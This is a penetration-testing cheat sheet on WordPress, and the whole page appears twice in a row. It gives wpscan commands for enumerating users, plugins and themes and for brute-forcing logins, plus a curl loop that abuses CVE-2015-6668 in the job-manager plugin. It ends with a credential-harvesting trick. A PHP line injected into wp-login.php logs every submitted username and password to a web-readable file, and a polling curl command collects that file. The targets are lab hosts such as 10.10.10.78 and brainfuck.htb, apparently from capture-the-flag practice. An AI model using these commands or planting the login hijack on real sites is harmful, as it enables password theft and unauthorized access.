Wordpress

`Installation`

gem install wpscan

`Enumeration`

Basic Scan

wpscan --url https://example.com

Users

wpscan --url https://example.com --enumerate u

Plugins

wpscan --url https://example.com --enumerate ap

Themes

wpscan --url https://example.com --enumerate at

`Brute-Forcing`

With username

wpscan --url https://example.com --passwords passwords.txt --usernames admin

With users wordlist

wpscan --url https://example.com --passwords passwords.txt --usernames users.txt

With a custom wordlist

wpscan --url https://example.com --passwords custom.txt

`Vulnerability Scanner`

Full Scan

wpscan --url https://example.com --enumerate vp,vt,vt

Plugins

wpscan --url https://example.com --enumerate vp

Themes

wpscan --url https://example.com --enumerate vt

Timthumbs

wpscan --url https://example.com --enumerate tt

Uses WPVulnDB

wpscan --url https://example.com --enumerate vp,vt,vt --api-token YOUR_API_TOKEN

`Other`

With output

wpscan --url https://example.com --output example.json

Custom User-Agent

wpscan --url https://example.com --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

Disable TLS check

wpscan --url https://brainfuck.htb --disable-tls-checks

`Vulnerabilities`

CVE-2015-6668

There is a path traversal in the job-manager plugin version 0.7.25
By browsing to IP/index.php/jobs/apply/8/ and modifying the number in the URL, it is possible to find the names of existing applications.

Enumerate with curl

for i in $(seq 1 25); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done

Use this POC to look for files associated to an application.

`Harvesting Credentials`

If is possible to write in wp-login.php, add this line just after <?php:

file_put_contents("/var/www/html/dev_wiki/hijack.txt", $_POST['log'] . " : " . $_POST['pwd'], FILE_APPEND);

Use this command to get the hijacked file as soon as is used:

watch -n 1 curl -s -X GET http://10.10.10.78/dev_wiki/hijack.txt

PreviousOpenNetAdmin NextJava-based web application

Last updated 1 month ago

Wordpress

`Installation`

gem install wpscan

`Enumeration`

Basic Scan

wpscan --url https://example.com

Users

wpscan --url https://example.com --enumerate u

Plugins

wpscan --url https://example.com --enumerate ap

Themes

wpscan --url https://example.com --enumerate at

`Brute-Forcing`

With username

wpscan --url https://example.com --passwords passwords.txt --usernames admin

With users wordlist

wpscan --url https://example.com --passwords passwords.txt --usernames users.txt

With a custom wordlist

wpscan --url https://example.com --passwords custom.txt

`Vulnerability Scanner`

Full Scan

wpscan --url https://example.com --enumerate vp,vt,vt

Plugins

wpscan --url https://example.com --enumerate vp

Themes

wpscan --url https://example.com --enumerate vt

Timthumbs

wpscan --url https://example.com --enumerate tt

Uses WPVulnDB

wpscan --url https://example.com --enumerate vp,vt,vt --api-token YOUR_API_TOKEN

`Other`

With output

wpscan --url https://example.com --output example.json

Custom User-Agent

wpscan --url https://example.com --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

Disable TLS check

wpscan --url https://brainfuck.htb --disable-tls-checks

`Vulnerabilities`

CVE-2015-6668

There is a path traversal in the job-manager plugin version 0.7.25
By browsing to IP/index.php/jobs/apply/8/ and modifying the number in the URL, it is possible to find the names of existing applications.

Enumerate with curl

for i in $(seq 1 25); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done

Use this POC to look for files associated to an application.

`Harvesting Credentials`

If is possible to write in wp-login.php, add this line just after <?php:

file_put_contents("/var/www/html/dev_wiki/hijack.txt", $_POST['log'] . " : " . $_POST['pwd'], FILE_APPEND);

Use this command to get the hijacked file as soon as is used:

watch -n 1 curl -s -X GET http://10.10.10.78/dev_wiki/hijack.txt

PreviousOpenNetAdmin NextJava-based web application

Last updated 1 month ago